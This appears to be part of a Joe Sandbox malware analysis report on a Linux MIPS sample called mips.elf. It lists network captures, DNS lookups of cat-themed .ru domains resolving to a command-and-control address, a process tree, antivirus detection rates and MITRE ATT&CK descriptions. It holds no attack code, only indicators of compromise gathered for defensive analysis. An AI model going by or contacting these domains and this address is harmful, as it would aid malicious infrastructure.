Feb 10, 2025 20:19:43.560791969 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:43.560862064 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:43.565629005 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:44.181881905 CET	38241	39816	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:44.181989908 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:44.182065964 CET	39816	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:45.191977024 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:45.196809053 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:45.196880102 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:45.197587967 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:45.202418089 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:45.202477932 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:45.207251072 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:45.798624992 CET	38241	39818	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:45.798785925 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:45.798839092 CET	39818	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:46.812858105 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:46.817629099 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:46.817732096 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:46.818837881 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:46.823652029 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:46.823724031 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:46.828481913 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:56.824743986 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:19:56.829514027 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:57.005007029 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:19:57.005222082 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:20:07.362708092 CET	43928	443	192.168.2.23	91.189.91.42
Feb 10, 2025 20:20:57.048692942 CET	39820	38241	192.168.2.23	185.93.89.106
Feb 10, 2025 20:20:57.053467035 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:20:57.227099895 CET	38241	39820	185.93.89.106	192.168.2.23
Feb 10, 2025 20:20:57.227226019 CET	39820	38241	192.168.2.23	185.93.89.106

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 10, 2025 20:19:06.035664082 CET	54747	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:06.046868086 CET	53	54747	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:07.687824965 CET	53795	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:07.694024086 CET	53	53795	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:09.309350014 CET	51818	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:09.319225073 CET	53	51818	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:10.930294037 CET	58677	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:10.937371969 CET	53	58677	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:12.553571939 CET	40485	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:12.559606075 CET	53	40485	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:14.204818964 CET	41892	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:14.215015888 CET	53	41892	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:15.823807955 CET	48123	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:15.830106020 CET	53	48123	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:17.438718081 CET	35861	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:17.445199966 CET	53	35861	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:19.075818062 CET	34670	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:19.082258940 CET	53	34670	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:20.692090034 CET	49537	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:20.698409081 CET	53	49537	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:22.307334900 CET	35091	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:22.313688993 CET	53	35091	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:23.943536997 CET	57071	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:23.949820995 CET	53	57071	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:25.581204891 CET	40441	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:25.591725111 CET	53	40441	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:27.200854063 CET	59562	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:27.207133055 CET	53	59562	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:28.840704918 CET	33009	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:28.850476027 CET	53	33009	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:30.470890999 CET	56072	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:30.477186918 CET	53	56072	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:32.105933905 CET	56406	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:32.112411022 CET	53	56406	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:33.749121904 CET	42665	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:33.757278919 CET	53	42665	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:35.373346090 CET	41785	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:35.379652023 CET	53	41785	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:37.004863977 CET	36593	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:37.011177063 CET	53	36593	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:38.620922089 CET	56941	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:38.631000996 CET	53	56941	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:40.275243998 CET	55457	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:40.281546116 CET	53	55457	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:41.918669939 CET	45302	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:41.928793907 CET	53	45302	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:43.543194056 CET	52475	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:43.549595118 CET	53	52475	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:45.184030056 CET	44951	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:45.191304922 CET	53	44951	8.8.8.8	192.168.2.23
Feb 10, 2025 20:19:46.801718950 CET	44556	53	192.168.2.23	8.8.8.8
Feb 10, 2025 20:19:46.812145948 CET	53	44556	8.8.8.8	192.168.2.23

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 10, 2025 20:19:06.035664082 CET	192.168.2.23	8.8.8.8	0xe98e	Standard query (0)	cat-are-here.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:07.687824965 CET	192.168.2.23	8.8.8.8	0xba8b	Standard query (0)	kittler.ru. [malformed]	256	299	false
Feb 10, 2025 20:19:09.309350014 CET	192.168.2.23	8.8.8.8	0xbff1	Standard query (0)	gokittler.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:10.930294037 CET	192.168.2.23	8.8.8.8	0xbda6	Standard query (0)	cats-master.ru. [malformed]	256	302	false
Feb 10, 2025 20:19:12.553571939 CET	192.168.2.23	8.8.8.8	0x1e5c	Standard query (0)	polizei.su. [malformed]	256	304	false
Feb 10, 2025 20:19:14.204818964 CET	192.168.2.23	8.8.8.8	0x14b1	Standard query (0)	kittlerer.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:15.823807955 CET	192.168.2.23	8.8.8.8	0x9ed5	Standard query (0)	polizei.su. [malformed]	256	307	false
Feb 10, 2025 20:19:17.438718081 CET	192.168.2.23	8.8.8.8	0xaccc	Standard query (0)	kittlez.ru. [malformed]	256	309	false
Feb 10, 2025 20:19:19.075818062 CET	192.168.2.23	8.8.8.8	0xca13	Standard query (0)	newkittler.ru. [malformed]	256	311	false
Feb 10, 2025 20:19:20.692090034 CET	192.168.2.23	8.8.8.8	0x1a96	Standard query (0)	kittlerer.ru. [malformed]	256	312	false
Feb 10, 2025 20:19:22.307334900 CET	192.168.2.23	8.8.8.8	0x4e3e	Standard query (0)	kittlerer.ru. [malformed]	256	314	false
Feb 10, 2025 20:19:23.943536997 CET	192.168.2.23	8.8.8.8	0x4ea1	Standard query (0)	gokittler.ru. [malformed]	256	315	false
Feb 10, 2025 20:19:25.581204891 CET	192.168.2.23	8.8.8.8	0xe9c3	Standard query (0)	cuttiecats.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:27.200854063 CET	192.168.2.23	8.8.8.8	0x86c4	Standard query (0)	kittlerer.ru. [malformed]	256	319	false
Feb 10, 2025 20:19:28.840704918 CET	192.168.2.23	8.8.8.8	0x7483	Standard query (0)	cats-master.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:30.470890999 CET	192.168.2.23	8.8.8.8	0xc579	Standard query (0)	qittler.ru. [malformed]	256	322	false
Feb 10, 2025 20:19:32.105933905 CET	192.168.2.23	8.8.8.8	0x774b	Standard query (0)	thekittler.ru. [malformed]	256	324	false
Feb 10, 2025 20:19:33.749121904 CET	192.168.2.23	8.8.8.8	0xf95d	Standard query (0)	gokittler.ru. [malformed]	256	325	false
Feb 10, 2025 20:19:35.373346090 CET	192.168.2.23	8.8.8.8	0x75b8	Standard query (0)	mykittler.ru. [malformed]	256	327	false
Feb 10, 2025 20:19:37.004863977 CET	192.168.2.23	8.8.8.8	0xc9b3	Standard query (0)	polizei.su. [malformed]	256	329	false
Feb 10, 2025 20:19:38.620922089 CET	192.168.2.23	8.8.8.8	0x3baa	Standard query (0)	cats-master.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:40.275243998 CET	192.168.2.23	8.8.8.8	0xf20e	Standard query (0)	kittlez.ru. [malformed]	256	332	false
Feb 10, 2025 20:19:41.918669939 CET	192.168.2.23	8.8.8.8	0x52a3	Standard query (0)	mykittler.ru	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:43.543194056 CET	192.168.2.23	8.8.8.8	0xad5c	Standard query (0)	qittler.ru. [malformed]	256	335	false
Feb 10, 2025 20:19:45.184030056 CET	192.168.2.23	8.8.8.8	0x9c08	Standard query (0)	qittler.ru. [malformed]	256	337	false
Feb 10, 2025 20:19:46.801718950 CET	192.168.2.23	8.8.8.8	0xc31d	Standard query (0)	mykittler.ru	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Feb 10, 2025 20:19:06.046868086 CET	8.8.8.8	192.168.2.23	0xe98e	No error (0)	cat-are-here.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:09.319225073 CET	8.8.8.8	192.168.2.23	0xbff1	No error (0)	gokittler.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:14.215015888 CET	8.8.8.8	192.168.2.23	0x14b1	No error (0)	kittlerer.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:25.591725111 CET	8.8.8.8	192.168.2.23	0xe9c3	No error (0)	cuttiecats.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:28.850476027 CET	8.8.8.8	192.168.2.23	0x7483	No error (0)	cats-master.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:38.631000996 CET	8.8.8.8	192.168.2.23	0x3baa	No error (0)	cats-master.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:41.928793907 CET	8.8.8.8	192.168.2.23	0x52a3	No error (0)	mykittler.ru	185.93.89.106	A (IP address)	IN (0x0001)	false
Feb 10, 2025 20:19:46.812145948 CET	8.8.8.8	192.168.2.23	0xc31d	No error (0)	mykittler.ru	185.93.89.106	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: mips.elf PID: 6216, Parent PID: 6134

General

Start time (UTC):	19:19:03
Start date (UTC):	10/02/2025
Path:	/tmp/mips.elf
Arguments:	/tmp/mips.elf
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	19:19:03
Start date (UTC):	10/02/2025
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	19:19:03
Start date (UTC):	10/02/2025
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	19:19:04
Start date (UTC):	10/02/2025
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	19:19:04
Start date (UTC):	10/02/2025
Path:	/tmp/mips.elf
Arguments:	-
File size:	5777432 bytes
MD5 hash:	0083f1f0e77be34ad27f849842bbb00c

Start time (UTC):	19:19:04
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	19:19:04
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-panel
Arguments:	xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfwm4
Arguments:	xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
File size:	420424 bytes
MD5 hash:	59defa3c00cc30d85ed77b738d55e9da

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-panel
Arguments:	xfce4-panel --display :1.0 --sm-client-id 2b4cc744e-8b9d-436f-9a4a-312b40faa2ec
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfwm4
Arguments:	xfwm4 --display :1.0 --sm-client-id 2389ab8d9-421f-49fc-90ad-c6cc4c15ac4c
File size:	420424 bytes
MD5 hash:	59defa3c00cc30d85ed77b738d55e9da

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfce4-session
Arguments:	-
File size:	264752 bytes
MD5 hash:	648919f03ad356720c8c27f5aaaf75d1

Start time (UTC):	19:19:05
Start date (UTC):	10/02/2025
Path:	/usr/bin/xfdesktop
Arguments:	xfdesktop --display :1.0 --sm-client-id 29178b886-02e2-48f2-9471-8dbd02206542
File size:	473520 bytes
MD5 hash:	dfb13e1581f80065dcea16f2476f16f2

Source: mips.elf	ReversingLabs: Detection: 42%
Source: mips.elf	Virustotal: Detection: 46%			Perma Link

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.
Tactics:	Credential Access
Data Sources:	Application Log: Application Log Content, Command: Command Execution, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.
Tactics:	Impact
Data Sources:	Command: Command Execution, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Termination, Service: Service Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report mips.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: mips.elf PID: 6216, Parent PID: 6134

General

File Activities

File Opened

File Read

File Moved

Process Activities

Process Forked

Prctl Requested

Thread Sleep

System Activities

Query System Information (uname)

Network Activities

Socket Listening

Socket Connecting

Chronological Activities

Analysis Process: mips.elf PID: 6218, Parent PID: 6216

Linux Analysis Report
mips.elf